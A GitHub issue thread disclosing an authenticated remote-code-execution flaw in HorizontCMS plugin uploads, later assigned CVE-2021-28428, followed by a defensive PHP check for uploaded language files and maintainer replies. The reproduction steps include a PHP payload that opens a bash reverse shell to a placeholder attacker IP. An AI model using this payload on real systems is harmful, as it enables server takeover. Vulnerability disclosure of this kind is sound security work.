Authenticated Remote Code Execution via a Malicious Plugin Upload #29

Open
bigb0sss opened this issue Mar 14, 2021 · 4 comments
bigb0sss commented Mar 14, 2021

Description of the Issue

One who is able to log into the admin panel can gain Remote Code Execution via uploading a malicious Plugin file via Plugins upload functionality.

Reproduction of the Issue

  1. Login to the admin panel (http:///admin/login)
  2. Prepare the malicious plugin file (We used a sample GoogleMaps (https://github.com/ttimot24/GoogleMaps) file and modified the "/resources/lang/en/message.php" to introduce our own PHP code)
<?php 

$shell = exec("/bin/bash -c 'bash -i >& /dev/tcp/<Attacker IP>/9001 0>&1'");

return [
        'successfully_added_location' => $shell, //'Location added succesfully!',
        'successfully_deleted_location' => 'Location deleted succesfully!',
        'successfully_set_center' => 'Location is successfully set as map center!'
];
  3. Zip the GoogleMaps plugin folder and upload it via Plugins functionality in the admin portal.
  4. Install & activate the Plugins
  5. Using "Add location" add an arbitrary location and click "Save" --> When its condition is met for "successfully_added_location," it will run our code ($shell) instead of printing out the original message 'Location added succesfully!'

Screenshots

  • Modifying the message.php file in the sample GoogleMaps plugin file:

  • Zip and upload the GoogleMaps plugin:

$ zip -r google.zip GoogleMaps


  • Install --> Activate --> Google Maps Plugin is created in the menu bar:

  • Add location --> Click Save (to initiate the message.php code)

  • Listener Receiving a Reverse Shell

Root Cause

  • The application takes an arbitrary plugin file and executes the user-supplied PHP code without proper sanitization.

Please let us know if you have any questions or need further information. Thanks.

Daniel Min & Chi Tran
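
A defensive check for the root cause above, as an added example that is not part of the original issue or of HorizontCMS: a language file only needs to return an array of literal strings, so an installer can tokenize each one in an uploaded archive and reject anything else. The function names and the resources/lang/<locale>/ layout (taken from the path in the report) are assumptions; the check covers language files only, not the rest of a plugin's PHP.

```php
<?php
// Added example, not HorizontCMS code; names and the resources/lang/<locale>/
// layout (from the report's path) are assumptions. Requires ext-zip.

// True only for a file of the form: return ['key' => 'literal', ...];
// '(' is deliberately not allowed, because 'exec'('id') is a valid PHP call.
function isPlainLangFile(string $source): bool
{
    $allowed = [T_OPEN_TAG, T_RETURN, T_CONSTANT_ENCAPSED_STRING, T_DOUBLE_ARROW,
                T_WHITESPACE, T_COMMENT, T_DOC_COMMENT, '[', ']', ',', ';'];
    foreach (token_get_all($source) as $token) {
        $id = is_array($token) ? $token[0] : $token;
        if (!in_array($id, $allowed, true)) {
            return false; // variable, function name, '=', inline HTML, ...
        }
    }
    return true;
}

// List language files in an uploaded plugin archive that fail the check.
function findUnsafeLangFiles(string $zipPath): array
{
    $zip = new ZipArchive();
    if ($zip->open($zipPath) !== true) {
        throw new RuntimeException("cannot open $zipPath");
    }
    $bad = [];
    for ($i = 0; $i < $zip->numFiles; $i++) {
        $name = $zip->getNameIndex($i);
        if (preg_match('#(^|/)resources/lang/[^/]+/[^/]+\.php$#i', $name)
            && !isPlainLangFile((string) $zip->getFromIndex($i))) {
            $bad[] = $name;
        }
    }
    $zip->close();
    return $bad;
}

// Constructed sample archive: one language file with a call in it, one clean.
$path = tempnam(sys_get_temp_dir(), 'plugin');
$zip = new ZipArchive();
$zip->open($path, ZipArchive::CREATE | ZipArchive::OVERWRITE);
$zip->addFromString('Demo/resources/lang/en/message.php',
    "<?php\n\$shell = exec('id');\nreturn ['saved' => \$shell];\n");
$zip->addFromString('Demo/resources/lang/hu/message.php',
    "<?php\nreturn ['saved' => 'Saved!']; // ok\n");
$zip->close();
print_r(findUnsafeLangFiles($path));
unlink($path);
```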

@bigb0sss bigb0sss reopened this Mar 15, 2021
@ttimot24 ttimot24 self-assigned this Mar 15, 2021
@bigb0sss
Author

Hi @ttimot24,

Hope all is well. Thank you for labeling the issues as security. We are wondering if you are planning to remediate the issues any time soon. If not, would it be okay for us to write a short blog about our findings on the HorizontCMS? Thanks.

@ttimot24
Owner

Hi @bigb0sss,

I'm planning to fix this security issue. My schedule is a bit busy, so I think it will be fixed in April.

Feel free to write about it on your blog.

@bigb0sss
Author

bigb0sss commented May 5, 2021

Hi @ttimot24,

Hope all is well.

We know you are still busy, but we just wanted to follow up again to see if the issues have been fixed?

If so, would you please point us to the updated code?

Please let us know if you have any questions. Thanks!

@bigb0sss
Author

bigb0sss commented Apr 6, 2022

Hi @ttimot24,

Hope all is well. CVE-2021-28428 (https://www.cve.org/CVERecord?id=CVE-2021-28428) was assigned for this issue. Thanks again for the prompt fix for the vulnerability.

All the best,
